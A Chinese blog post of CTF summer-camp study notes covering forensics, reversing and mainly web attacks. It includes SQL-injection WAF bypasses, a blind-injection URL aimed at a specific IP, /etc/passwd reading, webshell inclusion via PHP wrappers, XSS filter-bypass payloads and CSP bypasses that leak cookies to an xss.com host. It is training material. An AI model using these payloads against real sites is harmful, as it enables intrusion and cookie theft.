<h3 id="取证-amp-隐写"><a href="#取证-amp-隐写" class="headerlink" title="取证&amp;隐写"></a>取证&amp;隐写</h3><p>file文件类型<br>strings查看可见字符串<br>binwalk,foremost分析提取文件<br>010 Editor模板功能<br>png文件格式（修改高度/数据块）<br>LSB隐写 RGB值<br>gif 时间 空间 文件头<br>音频 频谱 波形 隐写软件<br>zip 核心目录区伪加密 爆破 CRC32（文件小） 明文攻击<br>流量包 文件修复 协议分析 数据提取<br>wireshark pcapfix dshell tshark<br>总体把握 协议分级 端点统计<br>过滤筛选 过滤语法 host,protocol,contains,特征值<br>发现异常 特殊字符串 协议某字段<br>数据提取 字符串/文件提取<br><code>tshark -r *....pcap* -T fields -e *data*|...</code><br>内存镜像分析 volatility<br>ntfs数据流 </p>
<h2 id="0x02-安卓"><a href="#0x02-安卓" class="headerlink" title="0x02 安卓"></a>0x02 安卓</h2><p>开发：签名<br>权限（root）<br>漏洞-&gt;利用<br>hook<br>反编译 加壳 混淆 </p>
<h2 id="0x03-逆向"><a href="#0x03-逆向" class="headerlink" title="0x03 逆向"></a>0x03 逆向</h2><p>汇编基础<br>基本工具<br>编辑 010editor(可自己写模板) editplus<br>可执行文件查看 PE Mach0 ELF<br>格式转换 Shellcode Helper<br>反汇编 IDA<br>设置data、code 查看cross reference 查看string list<br>F5 设置type 设置calling convention<br>调试器<br>gdb winDBG<br>OD x64dbg IDA内置调试器<br>步进 步过 运行至指定位置<br>搭建IDA远程调试环境 linux<br>去除软件保护<br>定位验证代码 正面 信息输入输出处 字符串<br>一些神奇的东西 apkdb z3求解器 边信道攻击<br>找main函数 快速定位关键位置<br>应对MFC程序 使用xspy查看消息处理函数<br>手动加载signature<br>F5的各种用法<br>《加密与解密》 《IDA Pro权威指南》 《软件调试》<br>//全程舔PPT配图，或许这就是大佬吧</p>
<h2 id="0x04-web"><a href="#0x04-web" class="headerlink" title="0x04 web"></a>0x04 web</h2><h3 id="套路"><a href="#套路" class="headerlink" title="套路"></a>套路</h3><p>用Python或Ruby快速编写exp<br>SQL语法细微区别<br>不同编程语言特性<br>不同web服务器特性<br>脑洞<br>Mysql栗子 ‘1abc’=’1ABC’ ‘123’=123 hex(‘root’)结果是字符串<br>Access栗子 </p>
<ul>
<li>查询数据-偏移注入/跨库查询（要用绝对路径）<br>  判断注入点 order by判断字段长度 获取表名 联合查询</li>
<li>读写数据 </li>
<li>执行命令</li>
<li>其他 不存在注释，用%00截断 不支持多行</li>
</ul>
<p>一、爆破，包括包括md5、爆破随机数、验证码识别等<br>二、绕WAF，包括花式绕Mysql、绕文件读取关键词检测之类拦截<br>三、花式玩弄几个PHP特性，包括弱类型，strpos和===，反序列化+destruct、\0截断、iconv截断、<br>四、密码题，包括hash长度扩展、异或、移位加密各种变形、32位随机数过小<br>五、各种找源码技巧，包括git、svn、xxx.php.swp、<em>www</em>.(zip|tar.gz|rar|7z)、xxx.php.bak、<br>六、文件上传，包括花式文件后缀 .php345 .inc .phtml .phpt .phps、各种文件内容检测<code>&lt;?php &lt;? &lt;% &lt;script language=php&gt;</code>、花式解析漏洞、<br>七、Mysql类型差异，包括和PHP弱类型类似的特性,0x、0b、1e之类，varchar和integer相互转换<br>八、open_basedir、disable_functions花式绕过技巧，包括dl、mail、imagick、bash漏洞、DirectoryIterator及各种二进制选手插足的方法<br>九、条件竞争，包括竞争删除前生成shell、竞争数据库无锁多扣钱<br>十、社工，包括花式查社工库、微博、QQ签名、whois<br>十一、windows特性，包括短文件名、IIS解析漏洞、NTFS文件系统通配符、::$DATA，冒号截断<br>十二、SSRF，包括花式探测端口，302跳转、花式协议利用、gophar直接取shell等<br>十三、XSS，各种浏览器auditor绕过、富文本过滤黑白名单绕过、flash xss、CSP绕过<br>十四、XXE，各种XML存在地方（rss/word/流媒体）、各种XXE利用方法（SSRF、文件读取）<br>十五、协议，花式IP伪造 X-Forwarded-For/X-Client-IP/X-Real-IP/CDN-Src-IP、花式改UA，花式藏FLAG、花式分析数据包<br>脑洞汇总：</p>
<ul>
<li>源代码<ul>
<li>robot.txt</li>
<li>comment</li>
<li>vim_swap_file</li>
<li>.pyc</li>
<li>.DS_Store</li>
<li>.git</li>
<li>.svn</li>
<li>bak file</li>
</ul>
</li>
<li>waf<ul>
<li>字符替换空型waf</li>
<li>特殊字符（串）拦截型waf</li>
</ul>
</li>
<li>考啥<ul>
<li>PHP弱类型</li>
<li>（反）序列化</li>
<li>XSS+CSRF+SSRF+CRLF</li>
<li>SQLi+RCE+upload</li>
<li>源码审计<br> -其他</li>
</ul>
</li>
</ul>
<h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><p>反射型<br>存储型<br>Dom-XSS<br>bypass filter<br>跨域 同源策略/回旋镖/穿甲伤害 UXSS</p>
<h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p>html css flash</p>
<h3 id="SQLi"><a href="#SQLi" class="headerlink" title="SQLi"></a>SQLi</h3><p>各种绕过。。</p>
<h3 id="文件包含和文件上传"><a href="#文件包含和文件上传" class="headerlink" title="文件包含和文件上传"></a>文件包含和文件上传</h3><p>伪协议<br>各种校验<br>.htaccess文件<br>变量与函数 一切输入都是有害的 一切进入函数的变量都是有害的<br>参数传递<br>可控变量<br>敏感功能点<br>通读代码</p>
<h3 id="变量覆盖"><a href="#变量覆盖" class="headerlink" title="变量覆盖"></a>变量覆盖</h3><p>危险函数</p>
<h3 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h3><h2 id="0x05-SQLi"><a href="#0x05-SQLi" class="headerlink" title="0x05 SQLi"></a>0x05 SQLi</h2><h3 id="union注入"><a href="#union注入" class="headerlink" title="union注入"></a>union注入</h3><p>有回显<br>猜解字段数目 limit a,b<br>最方便</p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><h3 id="boolean盲注"><a href="#boolean盲注" class="headerlink" title="boolean盲注"></a>boolean盲注</h3><p>写脚本<br>截取字符串 left substr mid regexp if</p>
<h3 id="Timing盲注"><a href="#Timing盲注" class="headerlink" title="Timing盲注"></a>Timing盲注</h3><p>无回显<br>效率低</p>
<h3 id="文件读写"><a href="#文件读写" class="headerlink" title="文件读写"></a>文件读写</h3><p>select LOADFILE(‘/etc/passwd’);之类的写shell进去也可以</p>
<h3 id="waf"><a href="#waf" class="headerlink" title="waf"></a>waf</h3><p>双写关键字 seselectlect OorR<br>大小写<br>编码绕过（直接认识16进制）<br>变换姿势 &lt;—&gt; || &amp;&amp; 空格 select(username)from(admin) 科学计数法绕过 where username=1e1union select in,between,like access中info=dlookup()<br>特殊字符 <code>/**/</code> 内联注释 %00 % 反引号</p>
<h3 id="这个啥。。写脚本"><a href="#这个啥。。写脚本" class="headerlink" title="这个啥。。写脚本"></a>这个啥。。写脚本</h3><p><a href="http://58.154.33.13:8003/?order=if((select(mid(flag,1,2))from(flag)),name,price" target="_blank" rel="external">http://58.154.33.13:8003/?order=if((select(mid(flag,1,2))from(flag)),name,price</a>)<br>‘a’ 11000110<br>$b  0000001 &amp; 1一位一位向前移<br>$c  0000000 根据这个是不是1回显判断原来的</p>
<h3 id="杂技"><a href="#杂技" class="headerlink" title="杂技"></a>杂技</h3><p>二次注入<br>宽字节注入 id=狷’<br>access偏移注入<br>万能密码（永真（字符串=0））<br>Mongodb注入 <code>[$ne] [$regex]</code><br>隐蔽的注入 字符串被mysql当成8字节double类型处理-》将查询内容转成数字进行运算<br>mysql过长截断 admin加空格插入后变成admin</p>
<h2 id="0x05-文件"><a href="#0x05-文件" class="headerlink" title="0x05 文件"></a>0x05 文件</h2><h3 id="LFI"><a href="#LFI" class="headerlink" title="LFI"></a>LFI</h3><p>读敏感文件<br>临时文件<br>多线程条件竞争脚本<br>截断</p>
<h3 id="RFI"><a href="#RFI" class="headerlink" title="RFI"></a>RFI</h3><p>远程代码执行<br>伪协议 file=’php://input’可直接post数据 php://filter读源码 phar,zip解压包含一句话木马</p>
<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>js校验 检查扩展名(白(配合文件包含漏洞 0x00截断 NTFS ADS特性 解析漏洞)/黑名单) MIME 随机文件名(随机值拼接到名字里) 隐藏路径(头像之类的就不行) 重写内容 检查内容</p>
<h2 id="0x06-XSS"><a href="#0x06-XSS" class="headerlink" title="0x06 XSS"></a>0x06 XSS</h2><p>打cookie<br>盲打后台（看referer）（打出dom…）<br>窃取用户信息<br>XSS Worm<br>XSS 后门<br>第一步：弹框<br>获取cookie：document.cookie(键值对)<br>cookie选项：</p>
<ul>
<li>expires失效日期默认session（1.1后max-age） </li>
<li>domain域名 path路径 默认当前的 重要<br> （跨域xhr请求时(AJAX请求时间之类的)默认不加cookie）<br>  （domain可以是父域，但不能是.com）</li>
<li>secure安全情况下传输（只看协议，可用HTTPS的XSS平台） </li>
<li>HttpOnly 默认不带 带的话没法用js查看或修改<br> （phpinfo页面可获取cookie）</li>
</ul>
<p>每设一条cookie就要set-cookie一次<br>可用document.cookie=。。。在前端console直接设置<br>修改：path/domain要和原来一样<br>删除：把expires设成过去的（path/domain要和原来一样）<br>编码：escape<br>浏览器解析方式<br>token 分出来的词/标签的部分 有限状态机<br>html五种元素 空元素<code>&lt;br&gt;</code> 原始文本元素<code>&lt;sript&gt;&lt;style&gt;</code> RCDATA元素<code>&lt;title&gt;&lt;textarea&gt;</code> 外部元素（MathML或SVG命名空间元素） 基本元素<br>RCDATA:在里面无论写啥都不会被解析，要先闭合标签<br>反射型 URL中 需要用户点链接 浏览器XSS Filter（chrome比较强） 输入-输出<br>存储型 数据库里 用户打开网页就可以 输入-进入数据库-取出数据库-输出<br>步骤：</p>
<ul>
<li>修改参数，提交后看源代码，寻找输出位置</li>
<li>看代码情况判断是否要/如何闭合（选择框里可用BP改，注意每一个post参数，多尝试隐藏参数）要使语法正确</li>
<li>转义尖括号：(双引号闭合)在标签内构造属性如onmouseover</li>
<li>构造JavaScript伪协议JavaScript:alert(document.domain)(a herf=””中)（资源型属性中）</li>
<li>过滤domain:编码成实体<code>&amp;#100;&amp;#111;&amp;#109;&amp;#97;&amp;#105;&amp;#110</code>或&amp;#x十六进制（&amp;#后数字前加几个0都可以）</li>
<li>把script/on/style/大小写过滤：<code>&lt;iframe src=&quot;data:text/html;base64,.......&quot;&gt;&lt;/iframe&gt;</code>(创建子窗口在父窗口弹窗)</li>
<li>（js字符串中）编码 \x十六进制 unicode \八进制</li>
<li>放到了行注释里 %0a换行</li>
<li>两个输入拼接 第一个末尾用\转义双引号 第二个后面可用//注释 <code>...=&quot;...&quot;+&quot;&amp;ss=aaa\&quot;+&quot;&amp;from==1;function/**/from(){}//&quot;</code>（js函数可先调用后申明） (sql注入也可以)</li>
<li>宽字节 “被转义\” 前面加高字节如%0c 或再加\转义\</li>
<li>js支持多行字符串 末尾加\ gb2312时加%c0吃掉转义符</li>
<li>无回显 eval(“”)会返回计算string得到的值 （json解析时经常用到,返回对象（要加圆括号将json转成语句）） 最后加\在console看error找到关键代码 ?key;alert(1);//=aaa</li>
<li>chrome会对”/&gt;/&lt;进行URL转换</li>
<li>setTimeout函数 ‘被转义 用js编码 阻止跳转：用字符串.replace替换成自己的外部js攻击</li>
<li>无法闭合” 可以直接闭合<code>&lt;/script&gt;</code></li>
<li>iframe inload src=javascript:/data: srcdoc</li>
<li>自带htmlencode的标签…</li>
</ul>
<p>例题<br><code>&quot;^alert(1)^&quot;</code>(在if里会先执行)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">if(&quot;&quot;^alert(1)^&quot;&quot;!=&quot;null&quot;)&#123;</div><div class="line">   document.getElementById(&apos;test&apos;).innerHTML=&quot;&quot;^alert(1)^&quot;&quot;;</div><div class="line">    &#125;</div></pre></td></tr></table></figure></p>
<p><code>*///1&quot;!=&quot;null&quot;){alert(1);/*</code>（多行注释和单行注释配合使用）<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">if(&quot;*///1&quot;!=&quot;null&quot;)&#123;alert(1);/*&quot;!=&quot;null&quot;)&#123;</div><div class="line">   document.getElementById(&apos;test&apos;).innerHTML=&quot;*///1&quot;!=&quot;null&quot;)&#123;alert(1);/*&quot;;</div><div class="line">    &#125;</div></pre></td></tr></table></figure></p>
<h2 id="CSRF-1"><a href="#CSRF-1" class="headerlink" title="CSRF"></a>CSRF</h2><p>登录a生成cookie-&gt;不登出a时访问危险网站b<br>上传文件 BP会自动生成CSRF Poc</p>
<h2 id="域、同源策略、CORS、JSONP"><a href="#域、同源策略、CORS、JSONP" class="headerlink" title="域、同源策略、CORS、JSONP"></a>域、同源策略、CORS、JSONP</h2><p>同源：协议、域名、端口（默认80）相同<br>非同源：cookie/LocalStorage/IndexDB无法读取 DOM无法获得 AJAX请求不能发送<br>二级域名相同（父子、兄弟域）允许通过设置document.domain共享cookie<br>跨域请求 JSONP WebSoket CORS<br>JSONP注入 通过添加一个<code>&lt;script&gt;</code>元素，通过src属性向服务器请求json数据，服务器将数据放在一个指定名字的回调函数返回 foo({“ip”:”8.8.8.8”}) 不造是啥但能执行 callback/jsonp/…=.（函数名）..的API<br>防御：校验referer（但可从HTTPS向http发请求或在src中用data:base64）<br>callback=alert(1);//有反射型注入<br>CORS 允许浏览器向不同源服务器发出任何请求<br>简单请求 head/get/post<br>加origin头 如果可以会回acess-control-allow-origin等<br>双方withCredentials:true且acess-control-allow-origin不为*才能接受cookie<br>预检请求<br>//0ctf xss</p>
<h2 id="CSP"><a href="#CSP" class="headerlink" title="CSP"></a>CSP</h2><p>配置 header头 Content-Security-Policy:defalt-src ‘self’;…<br>指令<br>html5有预加载<br>bypass:<br>firefox <code>&lt;link rel=&quot;dns-fetch&quot; herf=&quot;[cookie].xss.com&quot;&gt;</code><br>chrome <code>&lt;link rel=&quot;prefetch&quot; herf=&quot;xss平台&quot;&gt;</code><br>window.location=”地址”<br>jsonp绕过<br>反射或符号执行<br>重定向绕过</p>
<h2 id="else"><a href="#else" class="headerlink" title="else"></a>else</h2><p>这个夏令营主要还是玩耍吧，然后遇到了可爱哒盐喵，每天上完课次了外卖就关灯碎觉然后半夜起来high的作息意外的一样啊23333，喜欢小姐姐哒Lolita小裙叽嘿嘿嘿，各种梗都能接上的同好~</p>
<p>总之讲师助教师傅们都是很6哒，看齐看齐</p>
<p><br></p>

        
    

    
</div>


                

                <!-- Post Comments -->
                
                    
                
            </div>

            <!-- Post Prev & Next Nav -->
            <nav class="material-nav mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
    <!-- Prev Nav -->
    
        <a href="/2017/08/22/web/" id="post_nav-newer" class="prev-content">
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_back</i>
            </button>
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            新篇
        </a>
    

    <!-- Section Spacer -->
    <div class="section-spacer"></div>

    <!-- Next Nav -->
    
        <a href="/2017/07/23/ah/" id="post_nav-older" class="next-content">
            旧篇
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_forward</i>
            </button>
        </a>
    
</nav>

        </div>
    </div>



                    
                        <!-- Overlay For Active Sidebar -->
<div class="sidebar-overlay"></div>

<!-- Material sidebar -->
<aside id="sidebar" class="sidebar sidebar-colored sidebar-fixed-left" role="navigation">
    <div id="sidebar-main">
        <!-- Sidebar Header -->
        <div class="sidebar-header header-cover" style="background-image: url(/img/sidebar_header.png);">
    <!-- Top bar -->
    <div class="top-bar"></div>

    <!-- Sidebar toggle button -->
    <button type="button" class="sidebar-toggle mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon" style="display: initial;" data-upgraded=",MaterialButton,MaterialRipple">
        <i class="material-icons">clear_all</i>
        <span class="mdl-button__ripple-container">
            <span class="mdl-ripple">
            </span>
        </span>
    </button>

    <!-- Sidebar Avatar -->
    <div class="sidebar-image">
        <img src="/img/2.jpg" alt="铃落's avatar">
    </div>

    <!-- Sidebar Email -->
    <a data-toggle="dropdown" class="sidebar-brand" href="#settings-dropdown">
        ringfall3@gmail.com
        <b class="caret"></b>
    </a>
</div>


        <!-- Sidebar Navigation  -->
        <ul class="nav sidebar-nav">
    <!-- User dropdown  -->
    <li class="dropdown">
        <ul id="settings-dropdown" class="dropdown-menu">
            
                <li>
                    <a href="#" target="_blank" title="Email Me">
                        
                            <i class="material-icons sidebar-material-icons sidebar-indent-left1pc-element">email</i>
                        
                        Email Me
                    </a>
                </li>
            
        </ul>
    </li>

    <!-- Homepage -->
    
        <li id="sidebar-first-li">
            <a href="/">
                
                    <i class="material-icons sidebar-material-icons">home</i>
                
                主页
            </a>
        </li>
        
    

    <!-- Archives  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">inbox</i>
                
                    归档
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
            <li>
                <a class="sidebar_archives-link" href="/archives/2018/09/">九月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/08/">八月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/07/">七月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/05/">五月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/04/">四月 2018<span class="sidebar_archives-count">5</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/03/">三月 2018<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/02/">二月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/01/">一月 2018<span class="sidebar_archives-count">3</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/12/">十二月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/10/">十月 2017<span class="sidebar_archives-count">3</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/09/">九月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/08/">八月 2017<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/07/">七月 2017<span class="sidebar_archives-count">4</span></a>
            </ul>
        </li>
        
    

    <!-- Categories  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">chrome_reader_mode</i>
                
                分类
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
                <li>
                <a class="sidebar_archives-link" href="/categories/Blog/">Blog<span class="sidebar_archives-count">15</span></a></li><li><a class="sidebar_archives-link" href="/categories/Diary/">Diary<span class="sidebar_archives-count">11</span></a>
            </ul>
        </li>
        
    

    <!-- Pages  -->
    

    <!-- Article Number  -->
    
</ul>


        <!-- Sidebar Footer -->
        <!--
I'm glad you use this theme, the development is no so easy, I hope you can keep the copyright, I will thank you so much.
If you still want to delete the copyrights, could you still retain the first one? Which namely "Theme Material"
It will not impact the appearance and can give developers a lot of support :)

很高兴您使用并喜欢该主题，开发不易 十分谢谢与希望您可以保留一下版权声明。
如果您仍然想删除的话 能否只保留第一项呢？即 "Theme Material"
它不会影响美观并可以给开发者很大的支持和动力。 :)
-->

<!-- Sidebar Divider -->

    <div class="sidebar-divider"></div>


<!-- Theme Material -->

    <a href="https://github.com/viosey/hexo-theme-material"  class="sidebar-footer-text-a" target="_blank">
        <div class="sidebar-text mdl-button mdl-js-button mdl-js-ripple-effect sidebar-footer-text-div" data-upgraded=",MaterialButton,MaterialRipple">
            主题 - Material
            <span class="sidebar-badge badge-circle">i</span>
        </div>
    </a>


<!-- Help & Support -->
<!--

-->

<!-- Feedback -->
<!--

-->

<!-- About Theme -->
<!--

-->

    </div>

    <!-- Sidebar Image -->
    

</aside>

                    

                    
                        <!-- Footer Top Button -->
                        <div id="back-to-top" class="toTop-wrap">
    <a href="#top" class="toTop">
        <i class="material-icons footer_top-i">expand_less</i>
    </a>
</div>

                    

                    <!--Footer-->
<footer class="mdl-mini-footer" id="bottom">
    
        <!-- Paradox Footer Left Section -->
        <div class="mdl-mini-footer--left-section sns-list">
    <!-- Twitter -->
    
        <a href="https://twitter.com/twitter" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-twitter">
                <span class="visuallyhidden">Twitter</span>
            </button><!--
     --></a>
    

    <!-- Facebook -->
    
        <a href="https://www.facebook.com/facebook" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-facebook">
                <span class="visuallyhidden">Facebook</span>
            </button><!--
     --></a>
    

    <!-- Google + -->
    
        <a href="https://www.google.com/" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-gplus">
                <span class="visuallyhidden">Google Plus</span>
            </button><!--
     --></a>
    

    <!-- Weibo -->
    

    <!-- Instagram -->
    

    <!-- Tumblr -->
    

    <!-- Github -->
    
        <a href="https://github.com/RingFall" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-github">
                <span class="visuallyhidden">Github</span>
            </button><!--
     --></a>
    

    <!-- LinkedIn -->
    

    <!-- Zhihu -->
    

    <!-- Bilibili -->
    

    <!-- Telegram -->
    
    
    <!-- V2EX -->
    
</div>


        <!--Copyright-->
        <div id="copyright">
            Copyright&nbsp;©<script type="text/javascript">var fd = new Date();document.write("&nbsp;" + fd.getFullYear() + "&nbsp;");</script>RingFa1l
            
        </div>

        <!-- Paradox Footer Right Section -->

        <!--
        I am glad you use this theme, the development is no so easy, I hope you can keep the copyright.
        It will not impact the appearance and can give developers a lot of support :)

        很高兴您使用该主题，开发不易，希望您可以保留一下版权声明。
        它不会影响美观并可以给开发者很大的支持。 :)
        -->

        <div class="mdl-mini-footer--right-section">
            <div>
                <div class="footer-develop-div">Powered by <a href="https://hexo.io" target="_blank" class="footer-develop-a">Hexo</a></div>
                <div class="footer-develop-div">Theme - <a href="https://github.com/viosey/hexo-theme-material" target="_blank" class="footer-develop-a">Material</a></div>
            </div>
        </div>
    
</footer>


                    <!-- Import JS File -->

    <script>lsloader.load("lazyload_js","/js/lazyload.min.js?1BcfzuNXqV+ntF6gq+5X3Q==", true)</script>



    <script>lsloader.load("js_js","/js/js.min.js?V/53wGualMuiPM3xoetD5Q==", true)</script>



    <script>lsloader.load("np_js","/js/nprogress.js?pl3Qhb9lvqR1FlyLUna1Yw==", true)</script>


<script type="text/ls-javascript" id="NProgress-script">
    NProgress.configure({
        showSpinner: true
    });
    NProgress.start();
    $('#nprogress .bar').css({
        'background': '#29d'
    });
    $('#nprogress .peg').css({
        'box-shadow': '0 0 10px #29d, 0 0 15px #29d'
    });
    $('#nprogress .spinner-icon').css({
        'border-top-color': '#29d',
        'border-left-color': '#29d'
    });
    setTimeout(function() {
        NProgress.done();
        $('.fade').removeClass('out');
    }, 800);
</script>













<!-- UC Browser Compatible -->
<script>
	var agent = navigator.userAgent.toLowerCase();
	if(agent.indexOf('ucbrowser')>0) {
		document.write('<link rel="stylesheet" href="/css/uc.css">');
	   alert('由于 UC 浏览器使用极旧的内核，而本网站使用了一些新的特性。\n为了您能更好的浏览，推荐使用 Chrome 或 Firefox 浏览器。');
	}
</script>

<!-- Import prettify js  -->



<!-- Window Load -->
<!-- add class for prettify -->
<script type="text/ls-javascript" id="window-load">
    $(window).on('load', function() {
        // Post_Toc parent position fixed
        $('.post-toc-wrap').parent('.mdl-menu__container').css('position', 'fixed');
    });

    
    
</script>

<!-- MathJax Load-->


<!-- Bing Background -->


<script type="text/ls-javascript" id="lazy-load">
    // Offer LazyLoad
    queue.offer(function(){
        $('.lazy').lazyload({
            effect : 'show'
        });
    });

    // Start Queue
    $(document).ready(function(){
        setInterval(function(){
            queue.execNext();
        },200);
    });
</script>

<!-- Custom Footer -->



<script>
    (function(){
        var scriptList = document.querySelectorAll('script[type="text/ls-javascript"]')

        for (var i = 0; i < scriptList.length; ++i) {
            var item = scriptList[i];
            lsloader.runInlineScript(item.id,item.id);
        }
    })()
console.log('\n %c © Material Theme | Version: 1.5.2 | https://github.com/viosey/hexo-theme-material %c \n', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-left-radius:5px;border-bottom-left-radius:5px;', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-right-radius:5px;border-bottom-right-radius:5px;');
</script>

                </main>
            </div>
        </body>
    
</html>
